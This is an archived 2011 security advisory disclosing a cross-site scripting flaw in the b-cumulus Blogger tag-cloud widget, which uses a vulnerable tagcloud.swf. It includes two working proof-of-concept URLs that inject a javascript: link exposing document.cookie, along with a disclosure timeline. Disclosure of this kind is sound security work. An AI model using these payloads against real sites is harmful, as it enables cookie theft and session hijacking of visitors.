B-Cumulus Cross Site Scripting

2011-01-18T00:00:00
ID PACKETSTORM:97618
Type packetstorm
Reporter MustLive
Modified 2011-01-18T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about Cross-Site Scripting vulnerability in b-cumulus.   
It's widget for Blogger, which is also using at separate sites.  
  
SecurityVulns ID: 11353.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of b-cumulus.  
  
----------  
Details:  
----------  
  
This XSS is similar to XSS vulnerability in WP-Cumulus, because it's using  
modified version of tagcloud.swf made by author of WP-Cumulus. About such  
vulnerabilities I wrote in 2009-2010, particularly about millions of flash  
files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my  
article XSS vulnerabilities in 34 millions flash files  
(http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00035.html).  
  
XSS (WASC-08):  
  
It can be used the file tagcloud.swf or tagcloud-ru.swf.  
  
http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E  
  
http://site/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E  
  
Code will execute after click. It's strictly social XSS. Also it's possible  
to conduct (like in WP-Cumulus) HTML Injection attack.  
  
------------  
Timeline:  
------------  
  
2011.01.17 - disclosed at my site.  
2011.01.18 - informed developers.  
  
I mentioned about this vulnerability at my site  
(http://websecurity.com.ua/4849/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`